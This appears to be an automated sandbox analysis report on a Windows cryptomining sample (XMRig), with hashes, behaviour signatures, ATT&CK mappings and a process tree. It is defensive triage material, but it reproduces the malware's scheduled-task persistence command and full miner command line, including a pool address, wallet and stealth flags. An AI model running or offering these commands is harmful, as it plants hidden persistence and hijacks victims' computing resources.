Analysis

  • max time kernel
    137s
  • max time network
    152s
  • platform
    windows10_x64
  • resource
    win10v20210410
  • submitted
    23-07-2021 19:07

General

  • Target

    eb9f90fdaf8f78ff76132098d17fd0bd.exe

  • Size

    45KB

  • MD5

    eb9f90fdaf8f78ff76132098d17fd0bd

  • SHA1

    516bbca9d82ae9e8d35a5120cf16b95d87a8c35a

  • SHA256

    479579cc0f9ecdbcdb6d8df674940a411a0fdaa9ab66fc87db6a24658f979204

  • SHA512

    fab644025e6f4e5d8761a3597bb166a2b14b0da0be01edda0194c9b634f3e9ca3dad45ff83342e61d37a0813b96e0a52455f19eca479fc62cefa3fc09410e13d

Score
10/10

Malware Config

Signatures

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner Payload 3 IoCs
  • Executes dropped EXE 2 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 27 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\eb9f90fdaf8f78ff76132098d17fd0bd.exe
    "C:\Users\Admin\AppData\Local\Temp\eb9f90fdaf8f78ff76132098d17fd0bd.exe"
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1868
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Local\Temp\Services.exe"' & exit
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3860
      • C:\Windows\system32\schtasks.exe
        schtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Local\Temp\Services.exe"'
        3⤵
        • Creates scheduled task(s)
        PID:2600
    • C:\Users\Admin\AppData\Local\Temp\Services.exe
      "C:\Users\Admin\AppData\Local\Temp\Services.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of SetThreadContext
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2704
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Local\Temp\Services.exe"' & exit
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2096
        • C:\Windows\system32\schtasks.exe
          schtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Local\Temp\Services.exe"'
          4⤵
          • Creates scheduled task(s)
          PID:1544
      • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
        "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
        3⤵
        • Executes dropped EXE
        PID:8
      • C:\Windows\explorer.exe
        C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-us-east1.nanopool.org:14433 --user=48QbPZUtWm8gG6T6eg6H7JGXaD6eNJH8o3RoyLgBeqym7TxydU9TfMfUUgaheqa7BFdhtfb9d665CgYDj6f5KvdjLeGJmdW.WORKER/picktutos --pass= --cpu-max-threads-hint=50 --cinit-idle-wait=5 --cinit-idle-cpu=100 --tls --cinit-stealth
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:2388

Network

MITRE ATT&CK Matrix ATT&CK v6

Execution

Scheduled Task

1
T1053

Persistence

Scheduled Task

1
T1053

Privilege Escalation

Scheduled Task

1
T1053

Discovery

System Information Discovery

1
T1082

Command and Control

Web Service

1
T1102

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\Services.exe
    MD5

    eb9f90fdaf8f78ff76132098d17fd0bd

    SHA1

    516bbca9d82ae9e8d35a5120cf16b95d87a8c35a

    SHA256

    479579cc0f9ecdbcdb6d8df674940a411a0fdaa9ab66fc87db6a24658f979204

    SHA512

    fab644025e6f4e5d8761a3597bb166a2b14b0da0be01edda0194c9b634f3e9ca3dad45ff83342e61d37a0813b96e0a52455f19eca479fc62cefa3fc09410e13d

  • C:\Users\Admin\AppData\Local\Temp\Services.exe
    MD5

    eb9f90fdaf8f78ff76132098d17fd0bd

    SHA1

    516bbca9d82ae9e8d35a5120cf16b95d87a8c35a

    SHA256

    479579cc0f9ecdbcdb6d8df674940a411a0fdaa9ab66fc87db6a24658f979204

    SHA512

    fab644025e6f4e5d8761a3597bb166a2b14b0da0be01edda0194c9b634f3e9ca3dad45ff83342e61d37a0813b96e0a52455f19eca479fc62cefa3fc09410e13d

  • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
    MD5

    8a967775b61469d620643ac7b8623551

    SHA1

    07cce4043304be719aab5aafe75e7e966276cf1c

    SHA256

    212de1e16de9cd4030f0617c3c52fba4c18b21856dabd3eb2ded1b3a9eced68e

    SHA512

    10c825361d545a32be723c9b62b99c7aa0bbacf357a1e8d62dff19df2b6671a9ca7e9edef564eba89887a56ba676e272350b7b67ea7a65723cf08820095478f1

  • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
    MD5

    8a967775b61469d620643ac7b8623551

    SHA1

    07cce4043304be719aab5aafe75e7e966276cf1c

    SHA256

    212de1e16de9cd4030f0617c3c52fba4c18b21856dabd3eb2ded1b3a9eced68e

    SHA512

    10c825361d545a32be723c9b62b99c7aa0bbacf357a1e8d62dff19df2b6671a9ca7e9edef564eba89887a56ba676e272350b7b67ea7a65723cf08820095478f1

  • memory/8-132-0x0000000000370000-0x0000000000371000-memory.dmp
    Filesize

    4KB

  • memory/8-136-0x0000000002A20000-0x0000000002A22000-memory.dmp
    Filesize

    8KB

  • memory/8-129-0x0000000000000000-mapping.dmp
  • memory/1544-134-0x0000000000000000-mapping.dmp
  • memory/1868-114-0x0000000000C70000-0x0000000000C71000-memory.dmp
    Filesize

    4KB

  • memory/1868-120-0x0000000003740000-0x0000000003742000-memory.dmp
    Filesize

    8KB

  • memory/1868-117-0x00000000036F0000-0x00000000036F1000-memory.dmp
    Filesize

    4KB

  • memory/1868-116-0x0000000001590000-0x0000000001599000-memory.dmp
    Filesize

    36KB

  • memory/2096-128-0x0000000000000000-mapping.dmp
  • memory/2388-138-0x00000001402EB66C-mapping.dmp
  • memory/2388-137-0x0000000140000000-0x0000000140758000-memory.dmp
    Filesize

    7.3MB

  • memory/2388-139-0x0000000000C00000-0x0000000000C20000-memory.dmp
    Filesize

    128KB

  • memory/2388-140-0x0000000140000000-0x0000000140758000-memory.dmp
    Filesize

    7.3MB

  • memory/2388-143-0x0000000014150000-0x0000000014170000-memory.dmp
    Filesize

    128KB

  • memory/2388-144-0x0000000014600000-0x0000000014620000-memory.dmp
    Filesize

    128KB

  • memory/2388-146-0x0000000014370000-0x0000000014390000-memory.dmp
    Filesize

    128KB

  • memory/2388-145-0x0000000014390000-0x00000000143B0000-memory.dmp
    Filesize

    128KB

  • memory/2600-119-0x0000000000000000-mapping.dmp
  • memory/2704-121-0x0000000000000000-mapping.dmp
  • memory/2704-135-0x000000001CB02000-0x000000001CB03000-memory.dmp
    Filesize

    4KB

  • memory/3860-118-0x0000000000000000-mapping.dmp